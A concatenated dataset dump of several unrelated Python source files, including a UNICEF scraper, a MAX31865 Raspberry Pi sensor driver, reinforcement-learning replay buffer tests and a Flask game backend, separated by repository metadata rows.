for x in range(8):
if not self.board[y][x]:
count += 1
continue
else:
if self.board[y][x][1:] == "Knight":
new_letter = "n"
else:
new_letter = self.board[y][x][1].lower()
if self.board[y][x][0] == "w":
new_letter = new_letter.upper()
board = board + new_letter
if count != 0: board = board + str(count)
board = board + "/"
return board
| 40.085616
| 156
| 0.491756
|
4a0eb623c105211327ae6c8a18838b2b9fb0ca0b
| 3,950
|
py
|
Python
|
unicef.py
|
timofonic-otherdevstuff/dap-scrapers
|
7b98ec546e5dcf56b82236f36db04c68743cc5ae
|
[
"Unlicense"
] | 3
|
2015-03-30T08:53:41.000Z
|
2017-05-05T13:37:08.000Z
|
unicef.py
|
timofonic-otherdevstuff/dap-scrapers
|
7b98ec546e5dcf56b82236f36db04c68743cc5ae
|
[
"Unlicense"
] | 2
|
2016-03-31T17:26:37.000Z
|
2016-03-31T17:28:15.000Z
|
unicef.py
|
OCHA-DAP/dap-scrapers
|
3beb34acfe5bf5f2fd7d2a15857264a1e65bcf08
|
[
"Unlicense"
] | 2
|
2016-03-31T17:02:03.000Z
|
2018-03-12T14:13:27.000Z
|
import logging
import dl
import messytables
import xypath
import re
import orm
import requests
import lxml.html
"""Value: dsID, region, indID, period, value, source, is_number
DataSet: dsID, last_updated, last_scraped, name
Indicator: indID, name, units
"""
log = logging.getLogger("unicef")
log.addHandler(logging.StreamHandler())
log.addHandler(logging.FileHandler("unicef.log"))
log.level = logging.WARN
dataset = {"dsID": "unicef-infobycountry",
"last_updated": None,
"last_scraped": orm.now(),
"name": "UNICEF info by country"
}
value_template = {"dsID": "unicef-infobycountry",
"is_number": True}
def split_ind(indtext):
"""
>>> split_ind("Crude death rate, 1970")
{'units': '', 'indID': 'Crude death rate', 'period': '1970'}
>>> split_ind("Public spending as a % of GDP (2007-2010*) allocated to: military")
{'units': '', 'indID': 'Public spending as a % of GDP allocated to: military', 'period': '2007/2010'}
>>> split_ind("Population (thousands) 2011, total")
{'units': 'thousands', 'indID': 'Population , total', 'period': '2011'}
"""
"""
1) extract years
2) extract bracketed text as units
3) rest as ind name
"""
indtext = indtext.replace("*", "")
try:
start, y1, y2, end = re.search("(.*?)(\d\d\d\d)-?(\d\d\d\d)?(.*)", indtext).groups()
except:
print "Couldn't parse %r" % indtext
return {'indID': indtext, 'period': '', 'units': ''}
if y2:
period = '/'.join((y1, y2))
else:
period = y1
rest = start + end
unit_search = re.search("(.*)\((.*)\)(.*)", rest)
if unit_search:
preunit, unit, postunit = unit_search.groups()
ind = preunit.strip() + " " + postunit.strip()
else:
unit = ''
ind = rest
ind = ind.strip(" ,")
return {'indID': ind, 'period': period, 'units': unit}
def getstats(url, country="PLACEHOLDER"):
handle = dl.grab(url)
mts = messytables.any.any_tableset(handle)
saves = 0
for mt in mts.tables:
table = xypath.Table.from_messy(mt)
inds = table.filter(lambda b: b.x == 0 and "EPI" in b.value)
if not inds:
continue
assert len(inds) == 1
top, = table.filter(lambda b: 'to the top' in b.value)
value, = inds.junction(top)
for ind in inds:
split = split_ind(ind.value)
values_tosave = dict(value_template)
values_tosave['source'] = url
values_tosave['region'] = country
values_tosave['value'] = value[2].value
indicator = {'indID': split['indID'],
'name': split['indID'],
'units': split['units']}
orm.Indicator(**indicator).save()
values_tosave['indID'] = split['indID']
orm.Value(**values_tosave).save()
saves = saves + 1
if saves != 1:
print "huh, %d saves for %r" % (saves, url)
def countrylist():
baseurl = 'http://www.unicef.org/infobycountry'
html = requests.get(baseurl).content
root = lxml.html.fromstring(html)
root.make_links_absolute(baseurl)
mostcountries = root.xpath("//div[@class='contentrow' or @class='contentrow_last']//a")
for country in mostcountries:
url = country.attrib['href']
if 'bvi.html' in country:
continue
html = requests.get(url).content
root = lxml.html.fromstring(html)
root.make_links_absolute(baseurl)
try:
link, = root.xpath('//a[normalize-space(text())="Statistics"]/@href')
except:
log.warn("No stats found for %r" % url)
continue
yield link, country.text_content()
if __name__ == "__main__":
orm.DataSet(**dataset).save()
for link, country in countrylist():
print repr([link, country])
getstats(link, country)
| 32.113821
| 105
| 0.575443
|
4a0eb676ac88a24aad4083abd15fffa61a4cbe13
| 7,108
|
py
|
Python
|
max31865.py
|
obiben/silvia-pi
|
d41a9222dda068403e66f1f1a9ef3ef1aabae75b
|
[
"MIT"
] | 2
|
2018-02-22T13:34:34.000Z
|
2021-02-02T21:28:30.000Z
|
max31865.py
|
obiben/silvia-pi
|
d41a9222dda068403e66f1f1a9ef3ef1aabae75b
|
[
"MIT"
] | 2
|
2019-05-16T00:10:17.000Z
|
2020-10-05T17:27:17.000Z
|
max31865.py
|
obiben/silvia-pi
|
d41a9222dda068403e66f1f1a9ef3ef1aabae75b
|
[
"MIT"
] | 2
|
2019-07-09T19:19:24.000Z
|
2021-06-20T13:04:25.000Z
|
#!/usr/bin/python
#The MIT License (MIT)
#
#Copyright (c) 2015 Stephen P. Smith
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
import time, math
import RPi.GPIO as GPIO
#import numpy
class max31865(object):
"""Reading Temperature from the MAX31865 with GPIO using
the Raspberry Pi. Any pins can be used.
Numpy can be used to completely solve the Callendar-Van Dusen equation
but it slows the temp reading down. I commented it out in the code.
Both the quadratic formula using Callendar-Van Dusen equation (ignoring the
3rd and 4th degree parts of the polynomial) and the straight line approx.
temperature is calculated with the quadratic formula one being the most accurate.
"""
def __init__(self, csPin = 8, misoPin = 9, mosiPin = 10, clkPin = 11):
self.csPin = csPin
self.misoPin = misoPin
self.mosiPin = mosiPin
self.clkPin = clkPin
self.setupGPIO()
def setupGPIO(self):
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(self.csPin, GPIO.OUT)
GPIO.setup(self.misoPin, GPIO.IN)
GPIO.setup(self.mosiPin, GPIO.OUT)
GPIO.setup(self.clkPin, GPIO.OUT)
GPIO.output(self.csPin, GPIO.HIGH)
GPIO.output(self.clkPin, GPIO.LOW)
GPIO.output(self.mosiPin, GPIO.LOW)
def readTemp(self):
#
# b10000000 = 0x80
# 0x8x to specify 'write register value'
# 0xx0 to specify 'configuration register'
#
# 0b10110010 = 0xB2
# Config Register
# ---------------
# bit 7: Vbias -> 1 (ON)
# bit 6: Conversion Mode -> 0 (MANUAL)
# bit5: 1-shot ->1 (ON)
# bit4: 3-wire select -> 1 (3 wire config)
# bits 3-2: fault detection cycle -> 0 (none)
# bit 1: fault status clear -> 1 (clear any fault)
# bit 0: 50/60 Hz filter select -> 0 (60Hz)
#
# 0b11010010 or 0xD2 for continuous auto conversion
# at 60Hz (faster conversion)
#
#one shot
self.writeRegister(0, 0xB2)
# conversion time is less than 100ms
time.sleep(.1) #give it 100ms for conversion
# read all registers
out = self.readRegisters(0,8)
conf_reg = out[0]
# print("config register byte: %x" % conf_reg)
[rtd_msb, rtd_lsb] = [out[1], out[2]]
rtd_ADC_Code = (( rtd_msb << 8 ) | rtd_lsb ) >> 1
temp_C = self.calcPT100Temp(rtd_ADC_Code)
[hft_msb, hft_lsb] = [out[3], out[4]]
hft = (( hft_msb << 8 ) | hft_lsb ) >> 1
# print("high fault threshold: %d" % hft)
[lft_msb, lft_lsb] = [out[5], out[6]]
lft = (( lft_msb << 8 ) | lft_lsb ) >> 1
# print("low fault threshold: %d" % lft)
status = out[7]
#
# 10 Mohm resistor is on breakout board to help
# detect cable faults
# bit 7: RTD High Threshold / cable fault open
# bit 6: RTD Low Threshold / cable fault short
# bit 5: REFIN- > 0.85 x VBias -> must be requested
# bit 4: REFIN- < 0.85 x VBias (FORCE- open) -> must be requested
# bit 3: RTDIN- < 0.85 x VBias (FORCE- open) -> must be requested
# bit 2: Overvoltage / undervoltage fault
# bits 1,0 don't care
#print "Status byte: %x" % status
if ((status & 0x80) == 1):
raise FaultError("High threshold limit (Cable fault/open)")
if ((status & 0x40) == 1):
raise FaultError("Low threshold limit (Cable fault/short)")
if ((status & 0x04) == 1):
raise FaultError("Overvoltage or Undervoltage Error")
return temp_C
def writeRegister(self, regNum, dataByte):
GPIO.output(self.csPin, GPIO.LOW)
# 0x8x to specify 'write register value'
addressByte = 0x80 | regNum;
# first byte is address byte
self.sendByte(addressByte)
# the rest are data bytes
self.sendByte(dataByte)
GPIO.output(self.csPin, GPIO.HIGH)
def readRegisters(self, regNumStart, numRegisters):
out = []
GPIO.output(self.csPin, GPIO.LOW)
# 0x to specify 'read register value'
self.sendByte(regNumStart)
for byte in range(numRegisters):
data = self.recvByte()
out.append(data)
GPIO.output(self.csPin, GPIO.HIGH)
return out
def sendByte(self,byte):
for bit in range(8):
GPIO.output(self.clkPin, GPIO.HIGH)
if (byte & 0x80):
GPIO.output(self.mosiPin, GPIO.HIGH)
else:
GPIO.output(self.mosiPin, GPIO.LOW)
byte <<= 1
GPIO.output(self.clkPin, GPIO.LOW)
def recvByte(self):
byte = 0x00
for bit in range(8):
GPIO.output(self.clkPin, GPIO.HIGH)
byte <<= 1
if GPIO.input(self.misoPin):
byte |= 0x1
GPIO.output(self.clkPin, GPIO.LOW)
return byte
def calcPT100Temp(self, RTD_ADC_Code):
R_REF = 430.0 # Reference Resistor
Res0 = 100.0; # Resistance at 0 degC for 400ohm R_Ref
a = .00390830
b = -.000000577500
# c = -4.18301e-12 # for -200 <= T <= 0 (degC)
c = -0.00000000000418301
# c = 0 # for 0 <= T <= 850 (degC)
#print("RTD ADC Code: %d" % RTD_ADC_Code)
Res_RTD = (RTD_ADC_Code * R_REF) / 32768.0 # PT100 Resistance
#print("PT100 Resistance: %f ohms" % Res_RTD)
#
# Callendar-Van Dusen equation
# Res_RTD = Res0 * (1 + a*T + b*T**2 + c*(T-100)*T**3)
# Res_RTD = Res0 + a*Res0*T + b*Res0*T**2 # c = 0
# (c*Res0)T**4 - (c*Res0)*100*T**3
# + (b*Res0)*T**2 + (a*Res0)*T + (Res0 - Res_RTD) = 0
#
# quadratic formula:
# for 0 <= T <= 850 (degC)
temp_C = -(a*Res0) + math.sqrt(a*a*Res0*Res0 - 4*(b*Res0)*(Res0 - Res_RTD))
temp_C = temp_C / (2*(b*Res0))
temp_C_line = (RTD_ADC_Code/32.0) - 256.0
# removing numpy.roots will greatly speed things up
#temp_C_numpy = numpy.roots([c*Res0, -c*Res0*100, b*Res0, a*Res0, (Res0 - Res_RTD)])
#temp_C_numpy = abs(temp_C_numpy[-1])
#print("Straight Line Approx. Temp: %f degC" % temp_C_line)
#print("Callendar-Van Dusen Temp (degC > 0): %f degC" % temp_C)
#print "Solving Full Callendar-Van Dusen using numpy: %f" % temp_C_numpy
if (temp_C < 0): #use straight line approximation if less than 0
# Can also use python lib numpy to solve cubic
# Should never get here in this application
temp_C = temp_C_line
return temp_C
class FaultError(Exception):
pass
if __name__ == "__main__":
try:
csPin = 5
misoPin = 19
mosiPin = 20
clkPin = 21
max = max31865(csPin,misoPin,mosiPin,clkPin)
while True:
tempC = max.readTemp()
print(tempC)
time.sleep(0.1)
except KeyboardInterrupt:
pass
GPIO.cleanup()
| 31.874439
| 86
| 0.677124
|
4a0eb6a3fb27045cd9bd9845892dbe62323443f4
| 349
|
py
|
Python
|
spark_dependencies/python_lib/nose2/exceptions.py
|
usc-isi-i2/WEDC
|
cf48355d8a5c6616fb34be9932520875e218d2c4
|
[
"Apache-2.0"
] | null | null | null |
spark_dependencies/python_lib/nose2/exceptions.py
|
usc-isi-i2/WEDC
|
cf48355d8a5c6616fb34be9932520875e218d2c4
|
[
"Apache-2.0"
] | null | null | null |
spark_dependencies/python_lib/nose2/exceptions.py
|
usc-isi-i2/WEDC
|
cf48355d8a5c6616fb34be9932520875e218d2c4
|
[
"Apache-2.0"
] | null | null | null |
# This module contains some code copied from unittest2/ and other code
# developed in reference to unittest2.
# unittest2 is Copyright (c) 2001-2010 Python Software Foundation; All
# Rights Reserved. See: http://docs.python.org/license.html
__unittest = True
class TestNotFoundError(Exception):
"""Raised when a named test cannot be found"""
| 31.727273
| 70
| 0.765043
|
4a0eb7746a05dd11f90420db3ea0731624e6011c
| 897
|
py
|
Python
|
tests/unit/mock_ami.py
|
nchizhov/python-ami
|
d1953f4129452cbc015d7cb3d1e2f360dcaee45c
|
[
"BSD-3-Clause"
] | 95
|
2015-10-10T05:12:50.000Z
|
2022-02-28T15:20:48.000Z
|
tests/unit/mock_ami.py
|
nchizhov/python-ami
|
d1953f4129452cbc015d7cb3d1e2f360dcaee45c
|
[
"BSD-3-Clause"
] | 40
|
2016-04-12T16:49:07.000Z
|
2022-02-09T01:00:17.000Z
|
tests/unit/mock_ami.py
|
nchizhov/python-ami
|
d1953f4129452cbc015d7cb3d1e2f360dcaee45c
|
[
"BSD-3-Clause"
] | 63
|
2016-04-12T15:29:09.000Z
|
2022-02-24T12:19:50.000Z
|
import socket
import threading
from rx import Observable
class AMIMock(object):
thread = None
def __init__(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def start(self):
self.socket.bind((socket.gethostname(), 0,))
self.thread = threading.Thread(target=self.run)
self.thread.daemon = True
self.thread.start()
return self.socket.getsockname()
def run(self):
self.socket.listen(5)
def clients_iter():
try:
while True:
yield self.socket.accept()
except:
pass
def send_start(c):
return c[0].send(b'Asterisk Call Manager/6.6.6\r\n\r\n')
Observable.from_(clients_iter()) \
.subscribe(send_start)
def stop(self):
self.socket.close()
self.thread.join(1)
| 23
| 71
| 0.571906
|
4a0eb9235b83ad1387a1fd981f09a9fd2013a3a5
| 7,152
|
py
|
Python
|
keras_gym/caching/test_experience_replay.py
|
KristianHolsheimer/keras-gym
|
0296ddcc8685e1ce732c3173caaa0fd25af9ef58
|
[
"MIT"
] | 16
|
2019-07-01T10:56:26.000Z
|
2021-01-31T18:56:56.000Z
|
keras_gym/caching/test_experience_replay.py
|
KristianHolsheimer/keras-gym
|
0296ddcc8685e1ce732c3173caaa0fd25af9ef58
|
[
"MIT"
] | 10
|
2019-03-10T21:56:10.000Z
|
2020-09-06T21:49:55.000Z
|
keras_gym/caching/test_experience_replay.py
|
KristianHolsheimer/keras-gym
|
0296ddcc8685e1ce732c3173caaa0fd25af9ef58
|
[
"MIT"
] | 5
|
2019-08-02T22:11:19.000Z
|
2020-04-19T20:18:38.000Z
|
import gym
import numpy as np
from .experience_replay import ExperienceReplayBuffer
class MockEnv:
action_space = gym.spaces.Discrete(7)
def __init__(self, num_frames):
self.num_frames = num_frames
class TestExperienceReplayBuffer:
N = 7
S = np.expand_dims(np.arange(N), axis=1)
A = S[:, 0] % 100
R = S[:, 0]
D = np.zeros(N, dtype='bool')
D[-1] = True
EPISODE = list(zip(S, A, R, D))
def test_add(self):
buffer = ExperienceReplayBuffer(MockEnv(1), capacity=17)
for i, (s, a, r, done) in enumerate(self.EPISODE, 1):
buffer.add(s + 100, a, r + 100, done, episode_id=1)
assert len(buffer) == max(0, i - buffer.bootstrap_n)
np.testing.assert_array_equal(
buffer._e[:7],
[1, 1, 1, 1, 1, 1, 1])
np.testing.assert_array_equal(
buffer._d[:7].astype('int'),
[0, 0, 0, 0, 0, 0, 1])
for i, (s, a, r, done) in enumerate(self.EPISODE, i + 1):
buffer.add(s + 200, a, r + 200, done, episode_id=2)
assert len(buffer) == max(0, i - buffer.bootstrap_n)
np.testing.assert_array_equal(
buffer._e[:14],
[1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2])
np.testing.assert_array_equal(
buffer._d[:14].astype('int'),
[0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1])
for i, (s, a, r, done) in enumerate(self.EPISODE, i + 1):
buffer.add(s + 300, a, r + 300, done, episode_id=3)
assert len(buffer) == np.clip(i - buffer.bootstrap_n, 0, 17)
# buffer wraps around and overwrites oldest transitions
np.testing.assert_array_equal(
buffer._e,
[3, 3, 3, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3])
np.testing.assert_array_equal(
buffer._d.astype('int'),
[0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0])
np.testing.assert_array_equal(
buffer._a,
[
[0, 0, 0, 0, 1, 0, 0], # a=4
[0, 0, 0, 0, 0, 1, 0], # a=5
[0, 0, 0, 0, 0, 0, 1], # a=6
[0, 0, 0, 1, 0, 0, 0], # a=3
[0, 0, 0, 0, 1, 0, 0], # a=4
[0, 0, 0, 0, 0, 1, 0], # a=5
[0, 0, 0, 0, 0, 0, 1], # a=6
[1, 0, 0, 0, 0, 0, 0], # a=0
[0, 1, 0, 0, 0, 0, 0], # a=1
[0, 0, 1, 0, 0, 0, 0], # a=2
[0, 0, 0, 1, 0, 0, 0], # a=3
[0, 0, 0, 0, 1, 0, 0], # a=4
[0, 0, 0, 0, 0, 1, 0], # a=5
[0, 0, 0, 0, 0, 0, 1], # a=6
[1, 0, 0, 0, 0, 0, 0], # a=0
[0, 1, 0, 0, 0, 0, 0], # a=1
[0, 0, 1, 0, 0, 0, 0], # a=2
[0, 0, 0, 1, 0, 0, 0], # a=3
])
def test_sample(self):
buffer = ExperienceReplayBuffer(
env=MockEnv(num_frames=4), capacity=17, random_seed=7,
batch_size=16, bootstrap_n=2)
for ep in (1, 2, 3):
for s, a, r, done in self.EPISODE:
buffer.add(
s[[0, 0, 0, 0]] + ep * 100, a, r + ep * 100, done,
episode_id=ep)
# quickly check content, just to be safe
np.testing.assert_array_equal(
buffer._a,
[
[0, 0, 0, 0, 0, 1, 0], # a=5
[0, 0, 0, 0, 0, 0, 1], # a=6
[0, 0, 1, 0, 0, 0, 0], # a=2
[0, 0, 0, 1, 0, 0, 0], # a=3
[0, 0, 0, 0, 1, 0, 0], # a=4
[0, 0, 0, 0, 0, 1, 0], # a=5
[0, 0, 0, 0, 0, 0, 1], # a=6
[1, 0, 0, 0, 0, 0, 0], # a=0
[0, 1, 0, 0, 0, 0, 0], # a=1
[0, 0, 1, 0, 0, 0, 0], # a=2
[0, 0, 0, 1, 0, 0, 0], # a=3
[0, 0, 0, 0, 1, 0, 0], # a=4
[0, 0, 0, 0, 0, 1, 0], # a=5
[0, 0, 0, 0, 0, 0, 1], # a=6
[1, 0, 0, 0, 0, 0, 0], # a=0
[0, 1, 0, 0, 0, 0, 0], # a=1
[0, 0, 1, 0, 0, 0, 0], # a=2
[0, 0, 0, 1, 0, 0, 0], # a=3
[0, 0, 0, 0, 1, 0, 0], # a=4
])
transitions = [
[[300, 300, 300, 301], 0.9801, [300, 301, 302, 303]], # fill
[[200, 200, 200, 200], 0.9801, [200, 200, 201, 202]], # fill both
[[300, 300, 300, 300], 0.9801, [300, 300, 301, 302]], # fill both
[[200, 200, 200, 201], 0.9801, [200, 201, 202, 203]], # fill
[[300, 300, 300, 300], 0.9801, [300, 300, 301, 302]], # fill both
[[200, 201, 202, 203], 0.9801, [202, 203, 204, 205]], # normal
[[200, 200, 200, 201], 0.9801, [200, 201, 202, 203]], # fill
[[200, 200, 200, 200], 0.9801, [200, 200, 201, 202]], # fill both
[[103, 104, 105, 106], 0.0000, [105, 106, 200, 201]], # no bootst.
[[300, 300, 301, 302], 0.9801, [301, 302, 303, 304]], # fill
[[200, 200, 200, 200], 0.9801, [200, 200, 201, 202]], # fill both
[[202, 203, 204, 205], 0.0000, [204, 205, 206, 300]], # no bootst.
[[302, 303, 304, 305], 0.0000, [304, 305, 306, 102]], # no bootst.
[[201, 202, 203, 204], 0.9801, [203, 204, 205, 206]], # normal
[[103, 104, 105, 106], 0.0000, [105, 106, 200, 201]], # no bootst.
[[202, 203, 204, 205], 0.0000, [204, 205, 206, 300]]] # no bootst.
S, A, Rn, In, S_next, A_next = buffer.sample()
np.testing.assert_array_equal(In, [tr[1] for tr in transitions])
np.testing.assert_array_equal(
S[:, 0, :], [tr[0] for tr in transitions])
np.testing.assert_array_equal(
S_next[:, 0, :], [tr[2] for tr in transitions])
# check if actions are separate by bootstrap_n steps
for a, i_next, a_next in zip(A, In, A_next):
if i_next != 0:
assert np.argmax(a_next) - np.argmax(a) == buffer.bootstrap_n
# check if states and actions are aligned
np.testing.assert_array_equal(S[:, 0, -1] % 100, np.argmax(A, axis=1))
np.testing.assert_array_equal(
S_next[:, 0, -1] % 100, np.argmax(A_next, axis=1))
def test_shape(self):
buffer = ExperienceReplayBuffer(
env=MockEnv(num_frames=3), capacity=17, batch_size=5,
random_seed=5)
for ep in (1, 2, 3):
for i, (_, a, r, done) in enumerate(self.EPISODE):
s = 100 * ep + i * np.ones((11, 13, 3), dtype='int')
buffer.add(s, a, r, done, ep)
S, A, Rn, In, S_next, A_next = buffer.sample()
assert S.shape == (5, 11, 13, 3)
# check if all frames come from the same episode
np.testing.assert_array_equal(
S[:, 0, 0, :], # look at upper-left pixel only
[[300, 300, 300], # note: first frame is repeated twice
[300, 300, 301], # note: first frame is repeated once
[104, 105, 106],
[300, 301, 302],
[200, 201, 202]])
| 41.34104
| 79
| 0.434424
|
4a0eb98c3b045c51a23ea5f312d0adb7398ad66b
| 1,138
|
py
|
Python
|
gcloud/storage/connection.py
|
grapefruit623/gcloud-python
|
83d130e2cfb0bf867d7ba165ff157d31d52f1b35
|
[
"Apache-2.0"
] | null | null | null |
gcloud/storage/connection.py
|
grapefruit623/gcloud-python
|
83d130e2cfb0bf867d7ba165ff157d31d52f1b35
|
[
"Apache-2.0"
] | null | null | null |
gcloud/storage/connection.py
|
grapefruit623/gcloud-python
|
83d130e2cfb0bf867d7ba165ff157d31d52f1b35
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2014 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Create / interact with gcloud storage connections."""
from gcloud import connection as base_connection
class Connection(base_connection.JSONConnection):
"""A connection to Google Cloud Storage via the JSON REST API."""
API_BASE_URL = base_connection.API_BASE_URL
"""The base of the API call URL."""
API_VERSION = 'v1'
"""The version of the API, used in building the API call's URL."""
API_URL_TEMPLATE = '{api_base_url}/storage/{api_version}{path}'
"""A template for the URL of a particular API call."""
| 36.709677
| 74
| 0.738137
|
4a0eba4fec6079e53666851d4808dfb4a22d7e37
| 356
|
py
|
Python
|
snippets/gradient_mask.py
|
iubica/wx-portfolio
|
12101986db72bcaffd9b744d514d6f9f651ad5a1
|
[
"MIT"
] | 3
|
2018-03-19T07:57:10.000Z
|
2021-07-05T08:55:14.000Z
|
snippets/gradient_mask.py
|
iubica/wx-portfolio
|
12101986db72bcaffd9b744d514d6f9f651ad5a1
|
[
"MIT"
] | 6
|
2020-03-24T15:40:18.000Z
|
2021-12-13T19:46:09.000Z
|
snippets/gradient_mask.py
|
iubica/wx-portfolio
|
12101986db72bcaffd9b744d514d6f9f651ad5a1
|
[
"MIT"
] | 4
|
2018-03-29T21:59:55.000Z
|
2019-12-16T14:56:38.000Z
|
snippet_normalize (cr, width, height)
pattern = cairo.LinearGradient (0, 0, 1, 1)
pattern.add_color_stop_rgb (0, 0, 0.3, 0.8)
pattern.add_color_stop_rgb (1, 0, 0.8, 0.3)
mask = cairo.RadialGradient (0.5, 0.5, 0.25, 0.5, 0.5, 0.5)
mask.add_color_stop_rgba (0, 0, 0, 0, 1)
mask.add_color_stop_rgba (0.5, 0, 0, 0, 0)
cr.set_source (pattern)
cr.mask (mask)
| 27.384615
| 59
| 0.685393
|
4a0ebb6362d3a2b2cfebb68051abaedd0c6874d0
| 8,148
|
py
|
Python
|
backend/main.py
|
gopherkhan/playhvz
|
77a399c4d5da33f33681cb927b3f476d27a7d538
|
[
"Apache-2.0"
] | null | null | null |
backend/main.py
|
gopherkhan/playhvz
|
77a399c4d5da33f33681cb927b3f476d27a7d538
|
[
"Apache-2.0"
] | null | null | null |
backend/main.py
|
gopherkhan/playhvz
|
77a399c4d5da33f33681cb927b3f476d27a7d538
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TODO: High-level file comment."""
import sys
def main(argv):
pass
if __name__ == '__main__':
main(sys.argv)
# [START app]
import logging
import sys
import traceback
import time
import random
from api_helpers import AppError, respondError
from firebase import firebase
from flask import abort, Flask, jsonify, make_response, request, g
from google.appengine.ext import ndb
import flask_cors
import google.auth.transport.requests
import google.oauth2.id_token
import requests_toolbelt.adapters.appengine
import json
import threading
import api_calls
import constants
import in_memory_store as store
import config
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
requests_toolbelt.adapters.appengine.monkeypatch()
HTTP_REQUEST = google.auth.transport.requests.Request()
app = Flask(__name__)
flask_cors.CORS(app)
game_state = store.InMemoryStore()
api_mutex = threading.Lock()
def GetFirebase():
"""Get a Firebase connection, cached in the application context."""
db = getattr(g, '_database', None)
if db is None:
auth = firebase.FirebaseAuthentication(
config.FIREBASE_SECRET, config.FIREBASE_EMAIL, admin=True)
db = firebase.FirebaseApplication(
config.FIREBASE_CONFIG['databaseURL'], authentication=auth)
g._database = db
return db
@app.errorhandler(api_calls.InvalidInputError)
def HandleError(e):
print e.message
"""Pretty print data validation errors."""
return 'The request is not valid. %s' % e.message, 500
@app.errorhandler(AppError)
def HandleError(e):
print e.message
"""Pretty print data validation errors."""
return 'Something went wrong. %s' % e.message, 500
@app.errorhandler(500)
def HandleError(e):
"""Pretty print data validation errors."""
logging.exception(e)
print e
return '500: %r %r' % (type(e), e), 500
methods = {
'register': api_calls.Register,
'createGame': api_calls.AddGame,
'updateGame': api_calls.UpdateGame,
'addAdmin': api_calls.AddGameAdmin,
'createGroup': api_calls.AddGroup,
'updateGroup': api_calls.UpdateGroup,
'addPlayerToGroup': api_calls.AddPlayerToGroup,
'removePlayerFromGroup': api_calls.RemovePlayerFromGroup,
'createPlayer': api_calls.AddPlayer,
'addGun': api_calls.AddGun,
'updateGun': api_calls.UpdateGun,
'assignGun': api_calls.AssignGun,
'updatePlayer': api_calls.UpdatePlayer,
'addMission': api_calls.AddMission,
'deleteMission': api_calls.DeleteMission,
'updateMission': api_calls.UpdateMission,
'createChatRoom': api_calls.AddChatRoom,
'updateChatRoom': api_calls.UpdateChatRoom,
# 'sendChatMessage': api_calls.SendChatMessage,
'addRequestCategory': api_calls.AddRequestCategory,
'updateRequestCategory': api_calls.UpdateRequestCategory,
'addRequest': api_calls.AddRequest,
'addResponse': api_calls.AddResponse,
'addRewardCategory': api_calls.AddRewardCategory,
'updateRewardCategory': api_calls.UpdateRewardCategory,
'addReward': api_calls.AddReward,
'addRewards': api_calls.AddRewards,
'claimReward': api_calls.ClaimReward,
'sendNotification': api_calls.SendNotification,
'queueNotification': api_calls.QueueNotification,
'updateQueuedNotification': api_calls.UpdateQueuedNotification,
'registerUserDevice': api_calls.RegisterUserDevice,
'updateNotification': api_calls.UpdateNotification,
'addLife': api_calls.AddLife,
'infect': api_calls.Infect,
'joinResistance': api_calls.JoinResistance,
'joinHorde': api_calls.JoinHorde,
'setAdminContact': api_calls.SetAdminContact,
'updateRequestCategory': api_calls.UpdateRequestCategory,
'addRequestCategory': api_calls.AddRequestCategory,
'addRequest': api_calls.AddRequest,
'addResponse': api_calls.AddResponse,
'addQuizQuestion': api_calls.AddQuizQuestion,
'updateQuizQuestion': api_calls.UpdateQuizQuestion,
'updateMap': api_calls.UpdateMap,
'addQuizAnswer': api_calls.AddQuizAnswer,
'updateChatRoomMembership': api_calls.UpdateChatRoomMembership,
'updateQuizAnswer': api_calls.UpdateQuizAnswer,
'addDefaultProfileImage': api_calls.AddDefaultProfileImage,
'DeleteTestData': api_calls.DeleteTestData,
'DumpTestData': api_calls.DumpTestData,
'createMap': api_calls.CreateMap,
'addMarker': api_calls.AddMarker,
'updatePlayerMarkers': api_calls.UpdatePlayerMarkers,
'executeNotifications': api_calls.ExecuteNotifications,
'syncFirebase': api_calls.SyncFirebase,
}
@app.route('/')
def index():
return "<h1>Welcome To PlayHvZ (backend)!</h1>"
@app.route('/help')
def ApiHelp():
r = ['%s: %s' % (k, v.__doc__) for k, v in methods.iteritems()]
return '\n---\n\n'.join(r)
@app.route('/test', methods=['GET'])
def get_testdata():
testdata = GetFirebase().get('testdata', None)
return jsonify(testdata)
@app.route('/gun', methods=['GET'])
def GetGun():
gun = request.args['gunId']
